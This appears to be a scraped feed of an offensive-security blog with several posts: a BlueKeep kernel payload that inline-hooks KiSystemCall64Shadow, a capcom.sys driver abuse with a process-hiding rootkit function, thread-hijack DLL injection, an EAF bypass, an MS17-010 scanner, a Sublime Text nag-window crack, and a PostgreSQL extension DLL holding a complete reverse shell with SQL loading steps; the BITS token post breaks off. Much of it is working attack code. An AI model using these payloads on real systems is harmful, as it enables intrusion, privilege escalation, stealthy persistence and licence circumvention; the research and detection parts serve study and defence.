❌

Normal view

There are new articles available, click to refresh the page.
Before yesterdayzerosum0x0

Fixing Remote Windows Kernel Payloads to Bypass Meltdown KVA Shadow

8 November 2019 at 07:03

Update 11/8/2019: @sleepya_ informed me that the call-site for BlueKeep shellcode is actually at PASSIVE_LEVEL. Some parts of the call gadget function acquire locks and raise IRQL, causing certain crashes I saw during early exploit development. In short, payloads can be written that don't need to deal with KVA Shadow. However, this writeup can still be useful for kernel exploits such as EternalBlue and possibly future others.

BackgroundΒ 

BlueKeep is a fussy exploit. In a lab environment, the Metasploit module can be a decently reliable exploit*. But out in the wild on penetration tests the results have been... lackluster.

While I mostly blamed my failed experiences on the mystical reptilian forces that control everything, something inside me yearned for a more difficult explanation.

After the first known BlueKeep attacks hit this past weekend, a tweet by sleepya slipped under the radar, but immediately clued me in to at least one major issue.

From call stack, seems target has kva shadow patch. Original eternalblue kernel shellcode cannot be used on kva shadow patch target. So the exploit failed while running kernel shellcode

β€” Worawit Wang (@sleepya_) November 3, 2019

Turns out my BlueKeep development labs didn't have the Meltdown patch, yet out in the wild it's probably the most common case.

tl;dr: Side effects of the Meltdown patch inadvertently breaks the syscall hooking kernel payloads used in exploits such as EternalBlue and BlueKeep. Here is a horribly hacky way to get around it... but: it pops system shells so you can run Mimikatz, and after all isn't that what it's all about?

Galaxy Brain tl;dr: Inline hook compatibility for both KiSystemCall64Shadow and KiSystemCall64 instead of replacing IA32_LSTAR MSR.

PoC||GTFO: Experimental MSF BlueKeep + Meltdown Diff GitHub

* Fine print: BlueKeep can be reliable with proper knowledge of the NPP base address, which varies radically across VM families due to hotfix memory increasing the PFN table size. There's also an outstanding issue or two with the lock in the channel structure, but I digress.

Meltdown CPU VulnerabilityΒ 

Meltdown (CVE-2017-5754), released alongside Spectre as "Variant 3", is a speculative execution CPU bug announced in January 2018.

As an optimization, modern processors are loading and evaluating and branching ("speculating") way before these operations are "actually" to be run. This can cause effects that can be measured through side channels such as cache timing attacks. Through some clever engineering, exploitation of Meltdown can be abused to read kernel memory from a rogue userland process.

KVA ShadowΒ 

Windows mitigates Meltdown through the use of Kernel Virtual Address (KVA) Shadow, known as Kernel Page-Table Isolation (KPTI) on Linux, which are differing implementations of the KAISER fix in the original whitepaper.

When a thread is in user-mode, its virtual memory page tables should not have any knowledge of kernel memory. In practice, a small subset of kernel code and structures must be exposed (the "Shadow"), enough to swap to the kernel page tables during trap exceptions, syscalls, and similar.

Switching between user and kernel page tables on x64 is performed relatively quickly, as it is just swapping out a pointer stored in the CR3 register.

KiSystemCall64Shadow ChangesΒ 

The above illustrated process can be seen in the patch diff between the old and new NTOSKRNL system call routines.

Here is the original KiSystemCall64 syscall routine (before Meltdown):

The swapgs instruction changes to the kernel gs segment, which has a KPCR structure at offset 0. The user stack is stored at gs:0x10 (KPCR->UserRsp) and the kernel stack is loaded from gs:0x1a8 (KPCR->Prcb.RspBase).

Compare to the KiSystemCall64Shadow syscall routine (after the Meltdown patch):

  1. Swap to kernel GS segment
  2. Save user stack to KPCR->Prcb.UserRspShadow
  3. Check if KPCR->Prcb.ShadowFlags first bit is set
  • Set CR3 to KPCR->Prcb.KernelDirectoryTableBase
  • Load kernel stack from KPCR->Prcb.RspBaseShadow
  • The kernel chooses whether to use the Shadow version of the syscall at boot time in nt!KiInitializeBootStructures, and sets the ShadowFlags appropriately.

    NOTE: I have highlighted the common push 2b instructions above, as they will be important for the shellcode to find later on.

    Existing Remote Kernel PayloadsΒ 

    The authoritative guide to kernel payloads is in Uninformed Volume 3 Article 4 by skape and bugcheck. There you can read all about the difficulties in tasks such as lowering IRQL from DISPATCH_LEVEL to PASSIVE_LEVEL, as well as moving code execution out from Ring 0 and into Ring 3.

    Hooking IA32_LSTAR MSRΒ 

    In both EternalBlue and BlueKeep, the exploit payloads start at the DISPATCH_LEVEL IRQL.

    To oversimplify, on Windows NT the processor Interrupt Request Level (IRQL) is used as a sort of locking mechanism to prioritize different types of kernel interrupts. Lowering the IRQL from DISPATCH_LEVEL to PASSIVE_LEVEL is a requirement to access paged memory and execute certain kernel routines that are required to queue a user mode APC and escape Ring 0. If IRQL is dropped artificially, deadlocks and other bugcheck unpleasantries can occur.

    One of the easiest, hackiest, and KPP detectable ways (yet somehow also one of the cleanest) is to simply write the IA32_LSTAR (0xc000082) MSR with an attacker-controlled function. This MSR holds the system call function pointer.

    User mode executes at PASSIVE_LEVEL, so we just have to change the syscall MSR to point at a secondary shellcode stage, and wait for the next system call allowing code execution at the required lower IRQL. Of course, existing payloads store and change it back to its original value when they're done with this stage.

    Double Fault Root Cause AnalysisΒ 

    Hooking the syscall MSR works perfectly fine without the Meltdown patch (not counting Windows 10 VBS mitigations, etc.). However, if KVA Shadow is enabled, the target will crash with a UNEXPECTED_KERNEL_MODE_TRAP (0x7F) bugcheck with argument EXCEPTION_DOUBLE_FAULT (0x8).

    We can see that at this point, user mode can see the KiSystemCall64Shadow function:

    However, user mode cannot see our shellcode location:

    The shellcode page is NOT part of the KVA Shadow code, so user mode doesn't know of its existence. The kernel gets stuck in a recursive loop of trying to handle the page fault until everything explodes!

    Hooking KiSystemCall64ShadowΒ 

    So the Galaxy Brain moment: instead of replacing the IA32_LSTAR MSR with a fake syscall, how about just dropping an inline hook into KiSystemCall64Shadow? After all, the KVASCODE section in ntoskrnl is full of beautiful, non-paged, RWX, padded, and userland-visible memory.

    Heuristic Offset DetectionΒ 

    We want to accomplish two things:

    1. Install our hook in a spot after kernel pages CR3 is loaded.
    2. Provide compatibility for both KiSystemCall64Shadow and KiSystemCall64 targets.

    For this reason, I scan for the push 2b sequence mentioned earlier. Even though this instruction is 2-bytes long (also relevant later), I use a 4-byte heuristic pattern (0x652b6a00 little endian) as the preceding byte and following byte are stable in all versions of ntoskrnl that I analyzed.

    The following shellcode is the 0th stage that runs after exploitation:

    payload_start:
    ; read IA32_LSTAR
        mov ecx, 0xc0000082         
        rdmsr
    
        shl rdx, 0x20
        or rax, rdx                 
        push rax
    
    ; rsi = &KiSystemCall64Shadow
        pop rsi                      
    
    ; this loop stores the offset to push 2b into ecx
    _find_push2b_start:
        xor ecx, ecx
        mov ebx, 0x652b6a00
    
    _find_push2b_loop:
        inc ecx
        cmp ebx, dword [rsi + rcx - 1]
        jne _find_push2b_loop
    

    This heuristic is amazingly solid, and keeps the shellcode portable for both versions of the system call. There are even offset differences between the Windows 7 and Windows 10 KPCR structure that don't matter thanks to this method.

    The offset and syscall address are stored in a shared memory location between the two stages, for dealing with the later cleanup.

    Atomic x64 Function HookingΒ 

    It is well known that inline hooking on x64 comes with certain annoyances. All code overwrites need to be atomic operations in order to not corrupt the executing state of other threads. There is no direct jmp imm64 instruction, and early x64 CPUs didn't even have a lock cmpxchg16b function!

    Fortunately, Microsoft has hotpatching built into its compiler. Among other things, this allows Microsoft to patch certain functionality or vulnerabilities of Windows without needing to reboot the system, if they like. Essentially, any function that is hotpatch-able gets padded with NOP instructions before its prologue. You can put the ultimate jmp target code gadgets in this hotpatch area, and then do a small jmp inside of the function body to the gadget.

    We're in x64 world so there's no classic mov edi, edi 2-byte NOP in the prologue; however in all ntoskrnl that I analyzed, there were either 0x20 or 0x40 bytes worth of NOP preceding the system call routine. So before we attempt to do anything fancy with the small jmp, we can install the BIG JMP function to our fake syscall:

    ; install hook call in KiSystemCall64Shadow NOP padding
    install_big_jmp:
    
    ; 0x905748bf = nop; push rdi; movabs rdi &fake_syscall_hook;
        mov dword [rsi - 0x10], 0xbf485790 
        lea rdi, [rel fake_syscall_hook]
        mov qword [rsi - 0xc], rdi
    
    ; 0x57c3 = push rdi; ret;
        mov word [rsi - 0x4], 0xc357
    
    ; ... 
    
    fake_syscall_hook:
    
    ; ...
    
    

    Now here's where I took a bit of a shortcut. Upon disassembling C++ std::atomic<std::uint16_t>, I saw that mov word ptr is an atomic operation (although sometimes the compiler will guard it with the poetic mfence).

    Fortunately, small jmp is 2 bytes, and the push 2b I want to overwrite is 2 bytes.

    ; install tiny jmp to the NOP padding jmp
    install_small_jmp:
    
    ; rsi = &syscall+push2b
        add rsi, rcx
    
    ; eax = jmp -x
    ; fix -x to actual offset required
        mov eax, 0xfeeb
        shl ecx, 0x8
        sub eax, ecx
        sub eax, 0x1000
    
    ; push 2b => jmp -x;
        mov word [rsi], ax        
    

    And now the hooks are installed (note some instructions are off because of x64 instruction variable length and alignment):

    On the next system call: the kernel stack and page tables will be loaded, our small jmp hook will goto big jmp which will goto our fake syscall handler at PASSIVE_LEVEL.

    Cleaning Up the HookΒ 

    Multiple threads will enter into the fake syscall, so I use the existing sleepya_ locking mechanism to only queue a single APC with a lock:

    ; this syscall hook is called AFTER kernel stack+KVA shadow is setup
    fake_syscall_hook:
    
    ; save all volatile registers
        push rax
        push rbp
        push rcx
        push rdx
        push r8
        push r9
        push r10
        push r11
    
        mov rbp, STAGE_SHARED_MEM
    
    ; use lock cmpxchg for queueing APC only one at a time
    single_thread_gate:
        xor eax, eax
        mov dl, 1
        lock cmpxchg byte [rbp + SINGLE_THREAD_LOCK], dl
        jnz _restore_syscall
    
    ; only 1 thread has this lock
    ; allow interrupts while executing ring0 to ring3
        sti
        call r0_to_r3
        cli
    
    ; all threads can clean up
    _restore_syscall:
    
    ; calculate offset to 0x2b using shared storage
        mov rdi, qword [rbp + STORAGE_SYSCALL_OFFSET]
        mov eax, dword [rbp + STORAGE_PUSH2B_OFFSET]
        add rdi, rax
    
    ; atomic change small jmp to push 2b
        mov word [rdi], 0x2b6a
    

    All threads restore the push 2b, as the code flow results in less bytes, no extra locking, and shouldn't matter.

    Finally, with push 2b restored, we just have to restore the stack and jmp back into the KiSystemCall64Shadow function.

    _syscall_hook_done:
    
    ; restore register values
        pop r11
        pop r10
        pop r9
        pop r8
        pop rdx
        pop rcx
        pop rbp
        pop rax
    
    ; rdi still holds push2b offset!
    ; but needs to be restored
    
    ; do not cause bugcheck 0xc4 arg1=0x91
        mov qword [rsp-0x20], rdi
        pop rdi
    
    ; return to &KiSystemCall64Shadow+push2b
        jmp [rsp-0x28]
    

    You end up with a small chicken and egg problem at the end. You want to keep the stack pristine. My first naive solution ended in a DRIVER_VERIFIER_DETECTED_VIOLATION (0xc4) bugcheck, so I throw the return value deep in the stack out of laziness.

    ConclusionΒ 

    Here is a BlueKeep exploit with the new payload against the February 20, 2019 NT kernel, one of the more likely scenarios for a target patched for Meltdown yet still vulnerable to BlueKeep. The Meterpreter session stays alive for a few hours so I'm guessing KPP isn't fast enough just like with the IA32_LSTAR method.

    It's simple, it's obvious, it's hacky; but it works and so it's what you want.

    Puppet Strings - Dirty Secret for Windows Ring 0 Code Execution

    2 July 2017 at 03:35

    Update July 3, 2017: FuzzySec has also previously written some info about this.

    Ever since I began reverse engineering Shadow Brokers dumps [1] [2] [3], I've gotten into the habit of codenaming my projects. This trick is called Puppet Strings , and it lets you hitch a free ride into Ring 0 (kernel mode) on Windows.

    Some nation-state malware, such as Backdoor.Remsec by the ProjectSauron/Strider APT and Trojan.Turla by the Turla APT, performs a similar operation. However, the traditional nation-state modus operandi involves 0-day exploitation.

    But why waste 0-days when you can use kn0wn-days?

    Premise

    1. If you're running as an elevated admin, you're allowed to load (signed) drivers.
      • Local users are almost always admins.
      • UAC is known to be fundamentally broken.
    2. Load any (signed) driver with a kn0wn code execution vulnerability and exploit it.
      • It's a fairly obvious idea, and elementary to perform.
      • Windows does not have robust certificate revocation.
        • Thus, the DSE trust model is fundamentally broken!

    Ordinarily, Ring 0 is forbidden unless you have an approved Extended Validation (EV) Code-Signing Certificate (out of reach for most, especially for malicious purposes). There is a "Driver Signature Enforcement" (DSE) security feature present in all modern 64-bit versions of Windows.

    This enforcement can only be "officially" bypassed in two ways: attaching a kernel debugger or configuration at the advanced boot options menu. While these are common procedures for driver developers, they are highly-atypical actions for the average user.

    That's right, I'm talking about simply loading high-profile vulnerable drivers like capcom.sys:

    oh dear god this capcom.sys has an ioctl that disables smep and calls a provided function pointer, and sets SMEP back what even pic.twitter.com/jBCXO7YtNe

    β€” slipstream/RoL (@TheWack0lian) September 23, 2016

    Originally introduced in September 2016 as a form of video game anti-cheat, it was quickly discovered that the capcom.sys driver has an ioctl which disables Supervisor Mode Execution Prevention (SMEP) and executes a provided Ring 3 (user mode) function pointer with Ring 0 privileges. It's even kind enough to pass you a function pointer to MmGetSystemRoutineAddress(), which is basically like GetProcAddress() but for ntoskrnl.exe exports.

    The unfortunate part is it can still be easily loaded and exploited to this day.

    My opinion: file reputation for signed binaries should factor in cert validity period, revocation, digest algorithm, and file prevalence.

    β€” Matt Graeber (@mattifestation) June 24, 2017

    If a driver is signed with a valid timestamp, it also doesn't matter if the certificate has expired, as long as it isn't revoked. This trick is only possible because the Microsoft and root CA mechanisms for revoking driver signatures seems bad. This halfhearted approach violates the trust model that public key infrastructure is supposed to be built upon, as defined in the X.509 standard. Perhaps like UAC it is not a security boundary?

    Capcom.sys has been around for almost a year, and is easily one of the most well-known and simplest driver exploits of all time.

    While this driver is flagged 15/61 on VirusTotal, I have a personal list of known-vulnerable drivers that are 0/61 detection. They aren't too hard to find if you keep your eyes open to netsec news.

    Proof of Concept

    Code is available on GitHub at zerosum0x0/puppetstrings. To run it, you will need to independently obtain the capcom.sys driver (I don't want to deal with weird licensing issues).

    Test system was Windows 10 x64 Redstone 3 (Insider pre-release), just to show the new Driver Signing Policies (and its list of exceptions) introduced in Redstone 1 do not address this issue. This works on all versions of Windows if you update the EPROCESS.ActiveProcessLinks offset.

    1: kd> dt !_EPROCESS ActiveProcessLinks
       +0x2e8 ActiveProcessLinks : _LIST_ENTRY

    For the PoC, I had to do something relatively malicious to get the point across. Getting to Ring 0 with this technique is simple, doing something interesting once there is more difficult (e.g. we can already load drivers, the usual SYSTEM shell can be obtained through less dangerous methods).

    I load capcom.sys, pass it a function which performs the old rootkit technique of unlinking the current process from the EPROCESS.ActiveProcessLinks circularly-linked list, and then unload capcom.sys. This methodology is instant and makes the current process not show up in user mode tools like tasklist.exe.

    static void rootkit_unlink(PEPROCESS pProcess)
    {
     static const DWORD WIN10_RS3_OFFSET = 0x2e8;
    
     PLIST_ENTRY plist = 
      (PLIST_ENTRY)((LPBYTE)pProcess + WIN10_RS3_OFFSET);
    
     *((DWORD64*)plist->Blink) = (DWORD64)plist->Flink;
     *((DWORD64*)plist->Flink + 1) = (DWORD64)plist->Blink;
    
     plist->Flink = (PLIST_ENTRY) &(plist->Flink);
     plist->Blink = (PLIST_ENTRY) &(plist->Flink);
    }
    

    Of course, doing this in a modern rootkit is foolish, as PatchGuard has at least 4 different process list checks (CRITICAL_STRUCTURE_CORRUPTION Bug Check Arg4 = 4, 5, 1A, and 1B). But you can get experimental and think of something else cool to do, as you enjoy all of the freedoms Ring 0 brings.

    DOUBLEPULSAR showed us there's a lot of creative ideas to run in the kernel, even outside of a driver context. DSEFix exploits the same vulnerable VirtualBox driver used by Trojan.Turla to disable Driver Signature Enforcement entirely. It's even possible to use some undocumented features to create a reflectively-loaded driver, if one were so inclined...

    If you want to learn more about techniques like this, come to the Advanced Windows Post-Exploitation / Malware Forward Engineering DEF CON 25 workshop.

    ThreadContinue - Reflective DLL Injection Using SetThreadContext() and NtContinue()

    1 July 2017 at 07:52

    In the attempt to evade AV, attackers go to great lengths to avoid the common reflective injection code execution function, CreateRemoteThread(). Alternative techniques include native API (ntdll) thread creation and user APCs (necessary for SysWow64->x64), etc.

    This technique uses SetThreadContext() to change a selected thread's registers, and performs a restoration process with NtContinue(). This means the hijacked thread can keep doing whatever it was doing, which may be a critical function of the injected application.

    You'll notice the PoC (x64 only, #lazy) is using the common VirtualAllocEx() and WriteVirtualMemory() functions. But instead of creating a new remote thread, we piggyback off of an existing one, and restore the original context when we're done with it. This can be done locally (current process) and remotely (target process).

    Stage 0: Thread Hijack

    Code can be found in hijack/hijack.c

    1. Select a target PID.
    2. Process is opened, and any thread is found.
    3. Thread is suspended, and thread context (CPU registers) copied.
    4. Memory allocated in remote process for reflective DLL.
    5. Memory allocated in remote process for thread context.
    6. Set the thread context stack pointer to a lower address.
    7. Change thread context with SetThreadContext().
    8. Resume the thread execution.

    Stage 1: Reflective Restore

    Code can be found in dll/ReflectiveDll.c

    1. Normal reflective DLL injection takes place.
    2. Optional: Spawn new thread locally for a primary payload.
    3. Optional: Thread is restored with NtContinue(), using the passed-in previous context.

    You can go from x64->SysWow64 using Wow64SetThreadContext(), but not the other way around. I unfortunately did not observe possible sorcery for SysWow64->x64.

    One major hiccup to overcome, in x64 mode, is that the register RCX (function param 1) is volatile even across a SetThreadContext() call. To overcome this, I stored a cave (in this case, the DOS header). Luckily, NtContinue() allows setting the volatile registers, so there's no issues in the restoration process, otherwise it would have needed a hacky code cave inserted or something.

        // retrieve CONTEXT from DOS header cave
        lpParameter = (LPVOID)*((PULONG_PTR)((LPBYTE)uiLibraryAddress+2));
    

    Another issue is we could corrupt the original threads stack. I subtracted 0x2000 from RSP to find a new spot to spam up.

    I've seen similar (but non-successful) techniques for code injection. I found a rare amount of similar information [1] [2]. These techniques were not interested in performing proper cleanup of the stolen thread, which is not practical in many circumstances. This is essentially the same process that RtlRemoteCall() follows. As such, there may be issues for threads in a wait state returning an incorrect status? None of these sources uses reflective restoration.

    As user mode API is highly explored territory, this may not be an original technique. If so, take the example for what it is ([relatively] clean code with academic explanation) and chalk it up to multiple discovery. Leave flames, spam, and questions in the comments!

    If you want to learn more about techniques like this, come to the Advanced Windows Post-Exploitation / Malware Forward Engineering DEF CON 25 workshop.

    Proposed Windows 10 EAF/EMET "Bypass" for Reflective DLL Injection

    1 July 2017 at 07:01

    Windows 10 Redstone 3 (Fall Creator's Update) is adding Exploit Guard, bringing EMET's Export Address Table Access Filtering (EAF) mitigation, among others, to the system. We are still living in a golden era of Windows exploitation and post-exploitation, compared to the way things will be once the world moves onto Windows 10. This is a mitigation that will need to be bypassed sooner or later.

    EAF sets hardware breakpoints that check for legitimate access when the function exports of KERNEL32.DLL and NTDLL.DLL are read. It does this by checking if the offending caller code is part of a legitimately loaded module (which reflective DLL injection is not). EAF+ adds another breakpoint for KERNELBASE.DLL. One bypass was searching a DLL such as USER32.DLL for its imports, however Windows 10 will also be adding the brand new Import Address Table Access Filtering (IAF).

    So how can we avoid the EAF exploit mitigation? Simple, reflective DLLs, just like normal DLLs, take an LPVOID lpParam. Currently, the loader code does nothing with this besides forwarding it to DllMain. We can allocate and pass a pointer to this struct.

    #pragma pack(1)
    typedef struct _REFLECTIVE_LOADER_INFO
    {
    
        LPVOID  lpRealParam;
        LPVOID  lpDosHeader;
        FARPROC fLoadLibraryA;
        FARPROC fGetProcAddress;
        FARPROC fVirtualAlloc;
        FARPROC fNtFlushInstructionCache;
        FARPROC fVirtualLock;
    
    } REFLECTIVE_LOADER_INFO, *PREFLECTIVE_LOADER_INFO;
    

    Instead of performing two allocations, we could also shove this information in a code cave at start of the ReflectiveLoader(), or in the DOS headers. I don't think DOS headers are viable for Metasploit, which inserts shellcode there (that does some MSF setup and jumps to ReflectiveLoader(), so you can start execution at offset 0), but perhaps in the stub between the DOS->e_lfanew field and the NT headers.

    Reflective DLLs search backwards in memory for their base MZ DOS header address, requiring a second function with the _ReturnAddress() intrinsic. We know this information and can avoid the entire process (note: method not possible if we shove in DOS headers).

    Likewise, the addresses for the APIs we need are also known information before the reflective loader is called. While it's true that there is full ASLR for most loaded DLL modules these days, KERNEL32.DLL and NTDLL.DLL are only randomized upon system boot. Unless we do something weird, the addresses we see in the injecting process will be the same as in the injected process.

    In order to get code execution to the point of being able to inject code in another process, you need to be inside of a valid context or previously have necessary function pointers anyways. Since EAF does not alert from a valid context, obtaining pointers in the first place should not be an issue. From there, chaining this method with migration is not a problem.

    This kind of removes some of the novelty from reflective DLL injection. It's known that instead of self-loading, it's possible to perform the loader code from the injector (this method is seen in powerkatz.dll [PowerShell Empire's Mimikatz] and process hollowing). However, recently there was a circumstance where I was forced to use reflective injection due to the constraints I was working within. More on that at a later time, but reflective DLL injection, even with this extra step, still has plenty of uses and is highly coupled to the tools we're currently using... This is a simple fix when the issue comes up.

    MS17-010 (SMB RCE) Metasploit Scanner Detection Module

    19 April 2017 at 03:28

    Update April 21, 2017 - There is an active pull request at Metasploit master which adds DoublePulsar infection detection to this module.

    During the first Shadow Brokers leak, my colleagues at RiskSense and I reverse engineered and improved the EXTRABACON exploit, which I wrote a feature about for PenTest Magazine. Last Friday, Shadow Brokers leaked FuzzBunch, a Metasploit-like attack framework that hosts a number of Windows exploits not previously seen.Β Microsoft's official responseΒ says these exploits were fixed up inΒ MS17-010, released in mid-March.

    Yet again I find myself tangled up in the latest Shadow Brokers leak. I actually wrote a scanner to detect MS17-010 about 2-3 weeks prior to the leak, judging by the date on my initial pull request to Metasploit master. William Vu, of Rapid7 (and whom coincidentally I met in person the day of the leak), added some improvements as well. It was pulled into the master branch on the day of the leak. This module can be used to scan a network range (RHOSTS) and detect if the patch is missing or not.

    Module InformationΒ Page
    https://rapid7.com/db/modules/auxiliary/scanner/smb/smb_ms17_010

    Module Source Code
    https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb

    My scanner module connects to the IPC$ tree and attempts a PeekNamedPipe transaction on FID 0. If the status returned is "STATUS_INSUFF_SERVER_RESOURCES", the machine does not have the MS17-010 patch. After the patch, Win10 returns "STATUS_ACCESS_DENIED" and other Windows versions "STATUS_INVALID_HANDLE". In case none of these are detected, the module says it was not able to detect the patch level (I haven't seen this in practice).

    IPC$ is the "InterProcess Communication" share, which generally does not require valid SMB credentials in default server configurations. Thus this module can usually be done as an unauthed scan, as it can log on as the user "\" and connect to IPC$.

    This is the most important patch for Windows in almost a decade, as it fixes several remote vulnerabilities for which there are now public exploits (EternalBlue, EternalRomance, and EternalSynergy).

    These are highly complex exploits, but the FuzzBunch framework essentially makes the process as easy as point and shoot. EternalRomance does a ridiculous amount of "grooming", aka remote heap feng shui. In the case of EternalBlue, it spawns numerous threads and simultaneously exploits SMBv1 and SMBv2, and seems to talk Cairo, an undocumented SMB LanMan alternative (only known because of the NT4 source code leaks). I haven't gotten around to looking at EternalSynergy yet.

    I am curious to learn more, but have too many side projects at the moment to spend my full efforts investigating further. And unlike EXTRABACON, I don't see any "obvious" improvements other than I would like to see an open source version.

    Removing Sublime Text Nag Window

    8 September 2016 at 15:08
    I contemplated releasing this blog post earlier, and now that everyone has moved on from Sublime Text to Atom there's really no reason not to push it out. This is posted purely for educational purposes.

    Everyone who has used the free version of Sublime Text knows that when you go to save a file, it will randomly show a popup asking you to buy the software. This is known as a "nag window".



    The first time I saw it, I knew it had to be cracked. Just pop open the sublime_text.exe file in IDA Pro and search for the string.



    We find a match, and IDA tells us where it is cross referenced.



    We open the function that uses these .rdata bytes and see that it checks some globals, and performs a call to rand(). If any of the checks fail it will display the popup. The function itself is only about 20 lines of pretty basic assembly but we decompile it anyway because the screenshot is cooler that way.



    We open the hex view to see what the hex code for the start of the function looks like.



    Next we open sublime_text.exe in Hex Workshop and search for the hex string that matches the assembly.



    Finally, we patch the beginning of the function with the assembly opcode c3, which will cause the function to immediately return.



    After saving, there will be no more nag window. As an exercise to the reader, try to make Sublime think you have a registered copy.

    Windows DLL to Shell PostgreSQL Servers

    21 June 2016 at 04:07
    On Linux systems, you can include system() from the standard C library to easily shell a Postgres server. The mechanism for Windows is a bit more complicated.

    I have created a Postgres extension (Windows DLL) that you can load which contains a reverse shell. You will need file write permissions (i.e. postgres user). If the PostgreSQL port (5432) is open, try logging on as postgres with no password. The payload is in DllMain and will run even if the extension is not properly loaded. You can upgrade to meterpreter or other payloads from here.


    #define PG_REVSHELL_CALLHOME_SERVER "127.0.0.1"
    #define PG_REVSHELL_CALLHOME_PORT "4444"
    
    #include "postgres.h"
    #include <string.h>
    #include "fmgr.h"
    #include "utils/geo_decls.h"
    #include <winsock2.h> 
    
    #pragma comment(lib,"ws2_32")
    
    #ifdef PG_MODULE_MAGIC
    PG_MODULE_MAGIC;
    #endif
    
    #pragma warning(push)
    #pragma warning(disable: 4996)
    #define _WINSOCK_DEPRECATED_NO_WARNINGS
    
    BOOL WINAPI DllMain(_In_ HINSTANCE hinstDLL, 
                        _In_ DWORD fdwReason, 
                        _In_ LPVOID lpvReserved)
    {
        WSADATA wsaData;
        SOCKET wsock;
        struct sockaddr_in server;
        char ip_addr[16];
        STARTUPINFOA startupinfo;
        PROCESS_INFORMATION processinfo;
    
        char *program = "cmd.exe";
        const char *ip = PG_REVSHELL_CALLHOME_SERVER;
        u_short port = atoi(PG_REVSHELL_CALLHOME_PORT);
    
        WSAStartup(MAKEWORD(2, 2), &wsaData);
        wsock = WSASocket(AF_INET, SOCK_STREAM, 
                          IPPROTO_TCP, NULL, 0, 0);
    
        struct hostent *host;
        host = gethostbyname(ip);
        strcpy_s(ip_addr, sizeof(ip_addr), 
                 inet_ntoa(*((struct in_addr *)host->h_addr)));
    
        server.sin_family = AF_INET;
        server.sin_port = htons(port);
        server.sin_addr.s_addr = inet_addr(ip_addr);
    
        WSAConnect(wsock, (SOCKADDR*)&server, sizeof(server), 
                  NULL, NULL, NULL, NULL);
    
        memset(&startupinfo, 0, sizeof(startupinfo));
        startupinfo.cb = sizeof(startupinfo);
        startupinfo.dwFlags = STARTF_USESTDHANDLES;
        startupinfo.hStdInput = startupinfo.hStdOutput = 
                                startupinfo.hStdError = (HANDLE)wsock;
    
        CreateProcessA(NULL, program, NULL, NULL, TRUE, 0, 
                      NULL, NULL, &startupinfo, &processinfo);
    
        return TRUE;
    }
    
    #pragma warning(pop) /* re-enable 4996 */
    
    /* Add a prototype marked PGDLLEXPORT */
    PGDLLEXPORT Datum dummy_function(PG_FUNCTION_ARGS);
    
    PG_FUNCTION_INFO_V1(add_one);
    
    Datum dummy_function(PG_FUNCTION_ARGS)
    {
        int32 arg = PG_GETARG_INT32(0);
    
        PG_RETURN_INT32(arg + 1);
    }
    
    


    Here is the convoluted process of exploitation:
    postgres=# CREATE TABLE hextable (hex bytea);
    postgres=# CREATE TABLE lodump (lo OID);
    
    
    user@host:~/$ echo "INSERT INTO hextable (hex) VALUES 
                  (decode('`xxd -p pg_revshell.dll | tr -d '\n'`', 'hex'));" > sql.txt
    user@host:~/$ psql -U postgres --host=localhost --file=sql.txt
    
    
    postgres=# INSERT INTO lodump SELECT hex FROM hextable; 
    postgres=# SELECT * FROM lodump;
      lo
    -------
     16409
    (1 row)
    postgres=# SELECT lo_export(16409, 'C:\Program Files\PostgreSQL\9.5\Bin\pg_revshell.dll');
    postgres=# CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS
               'C:\Program Files\PostgreSQL\9.5\binpg_revshell.dll', 'dummy_function' LANGUAGE C STRICT; 
    

    BITS Manipulation: Stealing SYSTEM Tokens as a Normal User

    18 February 2016 at 04:15

    The Background Intelligent Transfer Service (BITS) is a Windows system service that facilitates file transfers between clients and servers, and serves as a backbone component for Windows Update. The service comes pre-installed on all modern versions of Windows, and is available in versions as early as Windows 2000 with service pack updates. There are ways for a non-Administrator user to manipulate the service into providing an Identification Token with the LUID of 999 (0x3e7), or the NT AUTHORITY\SYSTEM (Local System) root-equivalent user.


    BITS Manipulation is a pre-stage to modern privilege escalation attacks.

    BITS Manipulation is not a full exploit per se, but rather a pre-stage to local (and possibly remote) privilege escalation with a crafted executable. Identification Tokens can only lead to arbitrary code execution in the prescence of secondary Improper Access Control (CWE-284) vulnerabilities. Google's Project Zero has proved a number of full exploits using the technique. There are currently no known plans for Microsoft to fix this. Details for performing it and why it works remain exceptionally scarce.

    Windows Tokens

    Every user-mode thread on Windows executes with a Token, which is used as its security identifier by the kernel in order to determine access rights during system calls. When a user starts a process, the Primary Token for that process becomes one which represents the access rights of that user. Individual threads within the process are allowed to change their security context from the Primary Token through the use of Impersonation Tokens, which come in different privilege levels and can allow code execution in the context of a different user.

    Impersonation tokens are used throughout Windows in order to delegate responsibilities between users and the OS default users such as Local System, Local Service, and Network Service. For instance, a server process running as Network Service can impersonate a client user and perform actions on that user's behalf. It is extremely common and not suspicious behavior for a process to have multiple tokens open at any given time.

    Token Impersonation Levels

    A normal user obtaining an Identification Token as Local System is not necessarily an exploit in and of itself (some would argue, but at least not in the eyes of Microsoft). To understand why, a review of Token Impersonation Levels is required.

    BITS Manipulation and similar techniques only provide a SecurityIdentification Token for SYSTEM. This is useful for a number of tasks, but it still does not allow arbitrary code execution in the context of that user. Ordinarily, in order to achieve code execution as SYSTEM, the Token would need to be an Impersonation Token with the SecurityImpersonation or SecurityDelegation privilege.

    Identification-Only Exploitation

    There are a number of vulnerabilities in Windows where the Impersonation Level is not properly validated, such as in MS15-001, MS15-015, and MS15-050. These vulnerabilities failed to check if the Token Impersonation Level was sufficiently privileged before allowing arbitrary code execution in the context of the user.

    Here is a (simplified) reverse engineering of services.exe prior to the MS15-050 patch:


    Before MS15-050 Patch: The calling thread's Token is checked to see if it is run as SYSTEM, or LUID 999.

    With the background information above, the bug is easy to spot. Here is the same code after the patch:


    After MS15-050 Patch: The Impersonation Level is now correctly verified before the SYSTEM check.

    It should now be apparent why a normal user attempting to escalate privileges would want a SYSTEM Token, even if it is only of the SecurityIdentification privilege. There are countless token access control vulnerabilities already discovered, and more likely to be found.

    BITS Manipulation Methodology

    BITS, by default, is an automatically started Windows service which logs on as Local System. While the service is primarily used for uploading and downloading files between machines, it is also possible to create a BITS server which services the local machine context. When a download is queued, the BITS service connects to the server as the SYSTEM user.


    Forcing a BITS download to an attacker-controlled BITS server allows capture of a SYSTEM token.

    Here is the general methodology, which can be performed as a non-Administrator user on the machine:

    1. Create a BITS server with a local context.
    2. Launch a BITS download job, causing SYSTEM to start a client to the local BITS server.
    3. Capture SYSTEM's token when it interacts with the server.

    BITS Manipulation Implementation

